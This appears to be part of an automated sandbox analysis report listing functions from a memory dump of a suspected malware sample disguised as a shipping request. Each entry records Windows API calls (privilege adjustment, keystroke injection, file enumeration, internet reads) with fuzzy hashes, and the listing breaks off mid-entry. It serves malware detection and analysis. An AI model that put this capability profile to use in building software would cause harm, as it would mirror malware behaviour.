Instruction Fuzzy Hash: E041C270A00200AFDB50BB68CC52E7E77EEEF44728F14854DF956AB3C2DA749D018BA5

Function 006CEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 006CEB8A
_wcscmp.LIBCMT ref: 006CEBBA
_wcscmp.LIBCMT ref: 006CEBCF
FindNextFileW.KERNEL32(00000000,?), ref: 006CEBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 006CEC0E

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: d9b8673ae6e816c7a362d8b62566afebbf6bee2310138e4c26fe1a438b79998b
Instruction ID: f9f04c5f1935e76ab04a5b7fba25a44189be4b91fb1b60b8d10d3c1a78a36120
Opcode Fuzzy Hash: d9b8673ae6e816c7a362d8b62566afebbf6bee2310138e4c26fe1a438b79998b
Instruction Fuzzy Hash: 3A419B756002029FCB18DF68C491EAAB3EAFF49324F10455DE96A8B3A1DB32ED41CB55

Function 006E8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 006E8160
IsWindowEnabled.USER32 ref: 006E816E
GetForegroundWindow.USER32(?,?,00000001), ref: 006E817B
IsIconic.USER32 ref: 006E8189
IsZoomed.USER32 ref: 006E8197

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 2d2353e4dd1089864ea72ccfb520ffba039ad3123689a1860c05878ead30b37d
Instruction ID: c37f3b19c6f584a343270326d97aef63a978439f3723c4ed76d4e5839c4ff3ff
Opcode Fuzzy Hash: 2d2353e4dd1089864ea72ccfb520ffba039ad3123689a1860c05878ead30b37d
Instruction Fuzzy Hash: 31119D31302352AFE7216F66DC44AAEBB9EEF44760B05452DF849D7281CF74ED0386A8

Function 0069E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0069E014,76230AE0,0069DEF1,0071DC38,?,?), ref: 0069E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0069E03E

Strings

GetNativeSystemInfo, xrefs: 0069E038
kernel32.dll, xrefs: 0069E027

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: a6212b94dba0b29c5dac9d3c2c368c8bbd7a776fa6142e851d015e2adee5d718
Instruction ID: c723d551a16d037d628f8ae7c82dbf93b928b819ba03917980546fbccacc0621
Opcode Fuzzy Hash: a6212b94dba0b29c5dac9d3c2c368c8bbd7a776fa6142e851d015e2adee5d718
Instruction Fuzzy Hash: CFD05E704407169EDB319BA1E80965276DAAB14301F19841AA48192651FFB8C8818650

Function 0069B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0069B34E: GetWindowLongW.USER32(?,000000EB), ref: 0069B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0069B22F

Part of subcall function 0069B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0069B5A5

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 13487b8f3a319ed9525bf1bfd40686885ac132d481ec6b678c9dfb763850e39b
Instruction ID: 1222b2b7dbfa59de83dba11062d729cbaec60b07d493ef7c5a5c9d0c690037a4
Opcode Fuzzy Hash: 13487b8f3a319ed9525bf1bfd40686885ac132d481ec6b678c9dfb763850e39b
Instruction Fuzzy Hash: 3EA18A70114109BADF38AF6A7E88DFF2D9FEB42740B50511EF501D7EA1CB269E029276

Function 006D4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,006D43BF,00000000), ref: 006D4FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 006D4FD2

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: b00e550e1182e9149a50f23a667c3c503d91cc47263befd17296eed729828b08
Instruction ID: 943738c99e1152f37a9aadbd10792f156ea50ba4297fe1d616bb18a15304c08b
Opcode Fuzzy Hash: b00e550e1182e9149a50f23a667c3c503d91cc47263befd17296eed729828b08
Instruction Fuzzy Hash: 0641D671D04209BFEB209F94CC81EBF77BEEB80754F10402FF205A6391DA719E4196A4

Function 006877B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00687921

Strings

\Qs, xrefs: 00701028

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _memmove
String ID: \Qs
API String ID: 4104443479-4031464021
Opcode ID: fda6285041c2842c071cc1c7b3367d70412c9ef143f5b806e6c642a5c32894d9
Instruction ID: 93db918da249fe6f9373d3bac4af4a104be5033c90120894e55ee8bfa567ed13
Opcode Fuzzy Hash: fda6285041c2842c071cc1c7b3367d70412c9ef143f5b806e6c642a5c32894d9
Instruction Fuzzy Hash: 81A24A71A04219CFDB24DF58C4807ADBBB2FF58314F2582A9D859AB391D7349E82DB90

Function 006CE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 006CE20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006CE267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 006CE2B4

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: c22f6cc405e57b1c9cc4e63a8fd8309aeeaee2a04f4e057a4440867e37c14699
Instruction ID: c2003e1226fdfeabfe82828f64fb0c86f1f1b5bacef1dc17f61276e274a6ba82
Opcode Fuzzy Hash: c22f6cc405e57b1c9cc4e63a8fd8309aeeaee2a04f4e057a4440867e37c14699
Instruction Fuzzy Hash: C7215C75A00218EFCB00EFA5D884EADFBB9FF48310F0484ADE905A7251DB359906CB54

Function 006BB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0069F4EA: std::exception::exception.LIBCMT ref: 0069F51E
Part of subcall function 0069F4EA: __CxxThrowException@8.LIBCMT ref: 0069F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006BB180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006BB1AD
GetLastError.KERNEL32 ref: 006BB1BA

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 16049b384943876ca837af639dbd563fe44e31e8d63d61a57ab3f073a17cfc2a
Instruction ID: 5508a292e4425ea13508f87e50f42727053c0c6901881f1166e1e57aabaf98bd
Opcode Fuzzy Hash: 16049b384943876ca837af639dbd563fe44e31e8d63d61a57ab3f073a17cfc2a
Instruction Fuzzy Hash: 8F11BFB1400304AFE7289F58DC85D6BB7AEEB44710B21852EE05693241DBB0FC418B64

Function 006C6606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006C6623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 006C6664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006C666F

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: c8dd800d5f2239b1c27ea6faa2b64a0dd3e0a33fc2e3d85d9df7a83f7e4b9c36
Instruction ID: a46e36294cc3f2d6a44ae6be701610c87d375fb77d8f6dfe88ad96424aff1fa1
Opcode Fuzzy Hash: c8dd800d5f2239b1c27ea6faa2b64a0dd3e0a33fc2e3d85d9df7a83f7e4b9c36
Instruction Fuzzy Hash: A8110071E01228BFDB108F95DC45FAEBBBDEB45710F108156F900E7290D6B45E058BA5

Function 006C71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 006C7223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 006C723A
FreeSid.ADVAPI32(?), ref: 006C724A

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 23ac2231e9a9db5fe0c210c0fa5378302c27c4bbbc33580f6fc353c2bf1509f0
Instruction ID: 9eeb02fadf1f13935c1ff9198eacb1a18fc26314508a6d5edb60a0f6b8cd8857
Opcode Fuzzy Hash: 23ac2231e9a9db5fe0c210c0fa5378302c27c4bbbc33580f6fc353c2bf1509f0
Instruction Fuzzy Hash: 71F01D76A04309FFDF04DFE4DD89EEEBBB9EF08201F108569A606E2191E6749A448B14

Function 006CF56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 006CF599
FindClose.KERNEL32(00000000), ref: 006CF5C9

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: b3d22a0d65456e93d53380b039e93c6a80a48e1dda7710fc70c000364da16697
Instruction ID: 0733a0d2af7304617c7ec1b2cb74edf620e69ebde617690903f08d69b7069833
Opcode Fuzzy Hash: b3d22a0d65456e93d53380b039e93c6a80a48e1dda7710fc70c000364da16697
Instruction Fuzzy Hash: F711A5716002049FD710EF28D845A6EB3EAFF94324F00851DF965D7291CF34ED018B85

Function 006CCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,006DBE6A,?,?,00000000,?), ref: 006CCEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,006DBE6A,?,?,00000000,?), ref: 006CCEB9

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 5157fbad6e006a9e5baa2d70e3b759bf7a035bb5cefa047b0143988a7e85a96d
Instruction ID: f2e3edffdeaf21d7c6291498b9715ef2e6226ee83c899abd1412cb4bf3f9e3da
Opcode Fuzzy Hash: 5157fbad6e006a9e5baa2d70e3b759bf7a035bb5cefa047b0143988a7e85a96d
Instruction Fuzzy Hash: FDF08235100329EBDB20ABA4DC49FFA776EFF09361F008269F919D6181D6349A40CBA9

Function 006C411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 006C4153
keybd_event.USER32(?,7694C0D0,?,00000000), ref: 006C4166

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 98dfe4a0d63f52630bf8cdd4a6f57fe944b6d2a95081dc829e4ee6fcdc338521
Instruction ID: 0442c62fcc4cd86dcb65d8580808e8721584cd06a735493a8ecb3b082f477c22
Opcode Fuzzy Hash: 98dfe4a0d63f52630bf8cdd4a6f57fe944b6d2a95081dc829e4ee6fcdc338521
Instruction Fuzzy Hash: 8BF0447080034DAFDB158FA0C815BBE7BB0EF00305F04800AE966A6292DB798A129BA4

Function 006BAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006BACC0), ref: 006BAB99
CloseHandle.KERNEL32(?,?,006BACC0), ref: 006BABAB

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 1b978b647553e0f9bcdd8b17d4d57b52b80ee7a9a21d75b30adc1e0da21da67e
Instruction ID: 21e612ee8b3aef2383161d15be2e8d9b52450ba843294268b1ec6f176ee90a8f
Opcode Fuzzy Hash: 1b978b647553e0f9bcdd8b17d4d57b52b80ee7a9a21d75b30adc1e0da21da67e
Instruction Fuzzy Hash: 08E0BF71000610EFEB652F54EC05DB6BBAEEB04320B11C52DB459C1870DB625C909B54

Function 006A81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,006A6DB3,-0000031A,?,?,00000001), ref: 006A81B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006A81BA

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 46b13794d7f52247219035db3e354f0c76cc6774881e2f8f601f9c51957e54cb
Instruction ID: 26442fc70b995c4ffbbff7a60d026ed838f60e2d31a3f349b1c9adeb18697f0c
Opcode Fuzzy Hash: 46b13794d7f52247219035db3e354f0c76cc6774881e2f8f601f9c51957e54cb
Instruction Fuzzy Hash: 1AB09231044708EBDB202BE1EC09B58BF68EB09652F008110F60D440618F7658108A9A

Function 006AD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 388807a26ee55c712f0048e29e7af1f60491aa61d018a97b10ba4b432cd07f33
Instruction ID: b56c556f00c8891c02faf64562813b74d76eaac19ae84a487c2cdb3291834815
Opcode Fuzzy Hash: 388807a26ee55c712f0048e29e7af1f60491aa61d018a97b10ba4b432cd07f33
Instruction Fuzzy Hash: BE320621D29F014DD723A638C822376A299AFB73D4F15D727F81AB5EE6DB29C8834504

Function 006896C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: ba44fa068d0ee31c7db240d2459d941cf06abe2e039b7a1252496a65fb08760e
Instruction ID: 8b71cc711207da2b32a747e6f88abf82c95cddeabf209b20150bea1054ff34bc
Opcode Fuzzy Hash: ba44fa068d0ee31c7db240d2459d941cf06abe2e039b7a1252496a65fb08760e
Instruction Fuzzy Hash: 9B22DD716083019FD724EF24C890BBFB7E6AF84310F184A1DF99A97291DB71E905CB96

Function 006B038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a0eaf1d8746c64d007a7f1bccb548a0b8b4fb0d16dc7f4e4a090d938c2dc7e4
Instruction ID: ced39420e48cd201b27ca420ab59dc13abab3ff0199d28e5a2b516ea835443bc
Opcode Fuzzy Hash: 5a0eaf1d8746c64d007a7f1bccb548a0b8b4fb0d16dc7f4e4a090d938c2dc7e4
Instruction Fuzzy Hash: ADB1D220D2AF418DD72396398831336BA5CAFFB2D5F91D71BFC1A74D62EB2585834284

Function 006CB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 006CB6DF

Part of subcall function 006A344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,006CBDC3,00000000,?,?,?,?,006CBF70,00000000,?), ref: 006A3453
Part of subcall function 006A344A: __aulldiv.LIBCMT ref: 006A3473

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
